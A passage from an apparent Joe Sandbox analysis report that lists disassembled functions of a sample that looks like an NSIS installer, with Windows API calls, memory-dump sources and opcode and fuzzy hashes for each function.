                                                                                                            • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                                              • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                              • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                                            • wsprintfA.USER32 ref: 00405C80
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                                              • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                                              • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                            • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                                            • API String ID: 1265525490-3322868524
                                                                                                            • Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                            • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                                            • Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                            • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                            • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                                            • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                            • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                                            Function 004045CA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 269stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                            • lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 00404731
                                                                                                            • lstrcatW.KERNEL32(?,00427180), ref: 0040473D
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                                                              • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                                              • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,774D3420,00403512), ref: 004061E1
                                                                                                              • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                              • Part of subcall function 0040617E: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,774D3420,00403512), ref: 004061F5
                                                                                                              • Part of subcall function 0040617E: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,774D3420,00403512), ref: 00406208
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                                            • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                            • String ID: A
                                                                                                            • API String ID: 2246997448-3554254475
                                                                                                            • Opcode ID: 261e2510cd1b5ee8e3ef4165168ab5b045fd3ecf1d6b5ad41c9e26fd8e997a92
                                                                                                            • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                                            • Opcode Fuzzy Hash: 261e2510cd1b5ee8e3ef4165168ab5b045fd3ecf1d6b5ad41c9e26fd8e997a92
                                                                                                            • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                                            Function 00402DBC Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                                                                              • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                                              • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                                                                            Strings
                                                                                                            • Inst, xrefs: 00402EA3
                                                                                                            • soft, xrefs: 00402EAC
                                                                                                            • Null, xrefs: 00402EB5
                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                            • Error launching installer, xrefs: 00402E0C
                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-787788815
                                                                                                            • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                            • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                                            • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                            • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
                                                                                                            Function 00405F0C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                                            • GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604D
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 00406060
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                                            • SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060AA
                                                                                                            • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                                            • lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                                                            • lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                                            Strings
                                                                                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D3
                                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040601B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 900638850-730719616
                                                                                                            • Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                                                                            • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                                            • Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                                                                            • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E
                                                                                                            Function 004042E0 Relevance: 13.6, APIs: 9, Instructions: 99windowstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001), ref: 0040439B
                                                                                                            • GetSysColor.USER32(?), ref: 004043AC
                                                                                                            • SendMessageW.USER32(00000000,00000443,?,?), ref: 004043BA
                                                                                                            • SendMessageW.USER32(00000000,00000445,?,04010000), ref: 004043C8
                                                                                                            • lstrlenW.KERNEL32(?,?,04010000,?,?,?,00000000), ref: 004043CD
                                                                                                            • SendMessageW.USER32(00000000,00000435,?,00000000), ref: 004043DA
                                                                                                            • SendMessageW.USER32(00000000,00000449,?,?), ref: 004043EF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$ButtonCheckColorItemlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1008850623-0
                                                                                                            • Opcode ID: 11b25a5882e482cc4bb954ceb8ac25c4d956a406a47e3dc3acd2e145a1a4205b
                                                                                                            • Instruction ID: 6404b5b34e5ce3e62085b934271d78e479a703510769b93e2f3efd78726f1448
                                                                                                            • Opcode Fuzzy Hash: 11b25a5882e482cc4bb954ceb8ac25c4d956a406a47e3dc3acd2e145a1a4205b
                                                                                                            • Instruction Fuzzy Hash: D331A0B1A00109BFDB01AF64DD85A7D3BA9FB44744F00407AFA05FB2A0D7799E62DB58
                                                                                                            Function 00404196 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                            • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                            • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                            • GetSysColor.USER32(?), ref: 004041FA
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                            • DeleteObject.GDI32(?), ref: 00404224
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                            • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                            • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                            • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                                            Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                              • Part of subcall function 00405BD9: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                              • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 1149667376-2366072709
                                                                                                            • Opcode ID: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                                            • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                            • Opcode Fuzzy Hash: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                                            • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
                                                                                                            Function 00405194 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                            • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                            • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                            • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                                                                            • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                                                            • Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                                                                            • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                                                            Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                                                                            • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                            • wsprintfW.USER32 ref: 00402D81
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                              • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                              • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                              • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                            • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                                                            • Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                            • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                                                            Function 00404A5E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                                                            • GetMessagePos.USER32 ref: 00404A81
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                                                            Strings
                                                                                                            Memory Dump Source
